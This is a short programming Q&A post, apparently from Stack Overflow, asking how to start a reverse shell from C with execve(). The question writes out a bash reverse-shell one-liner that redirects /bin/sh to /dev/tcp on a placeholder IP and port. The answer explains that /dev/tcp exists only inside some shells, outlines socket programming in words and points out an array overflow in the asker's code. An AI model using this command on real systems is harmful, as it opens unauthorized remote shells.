Jake

Reputation: 16837

Execute reverse shell using execve()

I need to run a reverse shell using execve. I know how to run it from command line as follows:

$ /bin/sh -i > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1

I can run a simple version of /bin/sh call as follows:

#include <stdio.h>
#include <unistd.h>   /* declares execve() */

int main() {

   char *args[2];    /* room for only 2 pointers, but 3 are stored below */
   args[0] = "/bin/sh";
   args[1] = "-i";
   args[2] = NULL;   /* writes one element past the end of args */

   execve(args[0], args, NULL);
}

I am not able to figure out how to run the rest of the command. I tried assigning the remaining string `> /dev/tcp/IP_ADDR/PORT 0<&1 2>&1` as individual elements in the args array. When I run that it reports "Can't open >".

Is the reverse shell command I mentioned executable via execve()? If so, what would be the right way to do it? Thanks.

Upvotes: 1

Views: 1548

Answers (1)

Petr Skocik

Reputation: 60117

The /dev/tcp/*/* files don't exist. They're an abstraction that only exists in some shells (bash, ksh). You'll need to do regular socket programming in your C program (socket, bind, listen, accept and then dup2 the socket on the standard IO descriptors of the shell you spawn).

You should also fix the overflow in the array. An initialization such as `char *args[] = { "/bin/sh", "-i", 0 };` should be less error-prone.

Upvotes: 1
